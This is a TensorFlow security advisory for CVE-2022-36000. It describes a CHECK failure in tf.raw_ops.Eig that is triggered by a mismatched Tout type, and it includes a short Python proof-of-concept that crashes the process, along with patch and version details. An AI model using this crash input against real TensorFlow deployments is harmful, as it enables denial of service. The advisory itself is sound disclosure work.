## TFSA-2022-136: `CHECK` fail in `Eig`

### CVE Number
CVE-2022-36000

### Impact
`Eig` can be fed an incorrect `Tout` input, resulting in a `CHECK` fail that can trigger a denial of service attack.
```python
import tensorflow as tf
import numpy as np 
arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_1=tf.complex128
arg_2=True
arg_3=''
tf.raw_ops.Eig(input=arg_0, Tout=arg_1, compute_v=arg_2, name=arg_3)
```

### Patches
We have patched the issue in GitHub commit [aed36912609fc07229b4d0a7b44f3f48efc00fd0](https://github.com/tensorflow/tensorflow/commit/aed36912609fc07229b4d0a7b44f3f48efc00fd0).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.
